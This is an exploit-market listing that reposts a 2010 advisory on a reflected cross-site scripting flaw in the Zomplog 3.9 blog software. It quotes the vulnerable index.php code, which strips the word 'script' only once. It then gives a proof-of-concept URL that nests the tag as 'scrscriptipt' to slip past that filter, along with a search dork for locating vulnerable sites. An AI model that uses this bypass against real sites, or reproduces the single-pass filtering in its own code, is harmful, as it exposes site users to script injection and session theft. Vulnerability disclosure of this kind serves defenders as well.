[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Zomplog 3.9 XSS Vulnerability

Author
Itsecteam
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-11702
Category
web applications
Date add
10-04-2010
Platform
php
=============================
Zomplog 3.9 XSS Vulnerability 
=============================

############################################################################
#Title: Zomplog 3.9 XSS
#Vendor: http://www.zomp.nl
#Dork: "Powered by Zomplog"
############################################################################
#AUTHOR: ITSecTeam
#Email: Bug@ITSecTeam.com
#Website: http://www.itsecteam.com
#Forum : http://forum.ITSecTeam.com
#Original Advisory:
http://itsecteam.com/en/vulnerabilities/vulnerability42.htm
#Thanks: r3dm0v3, Pejvak, am!rkh@n
############################################################################

#DESCRIPTION (by vendor):###################################################
There are many great weblog systems around, but they all require technical
knowledge from their users. Zomplog is different: it let's you focus on
content instead of code.


#BUG:#######################################################################
file index.php
 10: // some general xxs protection
 11: $_GET['search'] = str_replace('script', '', $_GET['search']);
 12: $_GET['username'] = str_replace('script', '', $_GET['username']);


Code just removes script keyword that leaves file vulnerable to xss.


#POC:#######################################################################
http://www.site.com/index.php?search="><scrscriptipt>alert(1)</scrscriptipt>\



#  0day.today [2024-11-16]  #